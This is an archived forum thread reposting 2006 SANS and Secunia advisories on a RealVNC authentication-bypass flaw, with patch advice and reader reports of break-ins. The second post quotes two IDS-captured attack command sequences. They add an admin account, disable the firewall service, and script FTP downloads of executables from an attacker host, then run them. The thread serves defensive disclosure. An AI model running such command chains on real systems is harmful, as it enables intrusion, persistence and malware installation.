This is a read-only archive. No new posts or registrations. Privacy Page
Discussion

RealVNC Exploits - update/patch available

3 min read

This thread's last reply is from . Advice, software, and links below may be out of date — treat specific steps and download links with caution.

FYI…

- http://isc.sans.org/diary.php?storyid=1336
Last Updated: 2006-05-15 22:10:24 UTC
"Given the details of the RealVNC vulnerability that were disclosed this morning (May 15) on Full Disclosure, exploits are now being released. This note is to alert our readers that the exploit is trivial and very effective. (In fact, you can modify a VNC client to exploit the vulnerability with very little code changes – around 1 line.)
Administrators should be scanning their networks for open VNC servers (typically on TCP port 5900). You want to upgrade any VNC servers that give you protocol above 3.3. You can use the service detection in nmap to get the protocol number. We can't confirm that VNC servers from other projects like TightVNC or UltraVNC are vulnerable - I don't think they are vulnerable. At this time, it only appears that RealVNC servers are vulnerable. Unfortunately, there doesn't seem to determine which software the remote end is running. You only get to see the protocol number. Unless you like to have unauthorized folks moving your mouse around the screen, you are strongly urged to upgrade to the latest RealVNC release. Also, you should consider binding the VNC daemon to 127.0.0.1 and tunnelling the VNC traffic through an SSH tunnel, which will provide you with stronger authentication mechanisms. Google "vnc over ssh" for more detailed instructions on how to accomplish this on your platform of choice."
(RealVNC is an open-source cross-platform remote control solution.)
———————————————-
- http://secunia.com/advisories/20107/
Release Date: 2006-05-15
Critical: Highly critical
Impact: Security Bypass
Where: From remote
Solution Status: Vendor Patch
Software: RealVNC 4.x
…The vulnerability is caused due to an error within the handling of VNC password authentication requests. This can be exploited to bypass authentication and allows access to the remote system without requiring knowledge of the VNC password. The vulnerability has been reported in version 4.1.1. Other versions may also be affected. Note: Version 4.0 is reportedly not affected.
Solution:
Update to Free Edition version 4.1.2 or Personal Edition/Enterprise Edition version 4.2.3.
http://www.realvnc.com/download.html …"

:ph34r:
FYI…

RealVNC exploits in the wild
- http://isc.sans.org/diary.php?compare=1&storyid;=1341
Last Updated: 2006-05-19 10:35:46 UTC
"Active use of RealVNC to break into systems is being reported to us…
If you have any RealVNC exposed, check if you are hacked, and if not take measures immediately. If you want an inherently more secure solution check how to run vnc over ssh on your specific platform…

List of exploits reported to us by our readers:

- Austin from the UK reports that all shared printers in his office stated to print:

'Dear Network Administrator.
Please do not be alarmed.
My team is network security specialist.
You are using a vulnerable version of VNC.
Please upgrade your version soon.
We have not accessed your data but we could have.
Have a nice day'

The intrusion reportedly happened on a workstation where a visitor left a VNC server running. He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".

- An Anonymous report about the installation of typical tools installed by the warez and hacker crowd such as Serv-U and pwdump.

- Mike reported on a machine getting hacked and sent us what his IDS caught of it:
net user [user] [pass] /ADD
net localgroup Administrators [user] /ADD
net stop sharedaccess
sc delete sharedaccess
echo open [IP] [port] > ftptmp
echo user [ftpuserinfo] >> ftptmp
echo get usercontrol.exe >> ftptmp
echo get helpservice.svc >> ftptmp
echo get JAcheck.ini >> ftptmp
echo get JAcheck.dll >> ftptmp
echo bye >> ftptmp
ftp -n -s:ftptmp
del ftptmp
usercontrol /i
net start "ms system service"

Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. Perhaps more happened earlier, happens later, or just was not caught.

- An anonymous user reports: "We have been using RealVNC 4.1.1 and have been experiencing successful unauthorized connections to our machines. Also, we have seen increased traffic on our network which looks like scanning, some network printers have also been printing pages of gibberish." He concluded with "We are currently upgrading all VNC servers to 4.1.2."

- Another anonymously reported attack that was done on port 5900 (also an IDS capture), so the RealVNC angle is only an assumption at this point:

cd %WINDIR%\system32
echo open [IP] [PORT] >>ms32
echo [user] >>ms32
echo [pass] >>ms32
echo get pack.exe>>ms32
echo get Iass.exe>>ms32
echo get mssd.ini>>ms32
echo
ipconfig
net start dnsd
pack.exe

It sure looks like these machines are slowly getting owned one by one …"

:ph34r: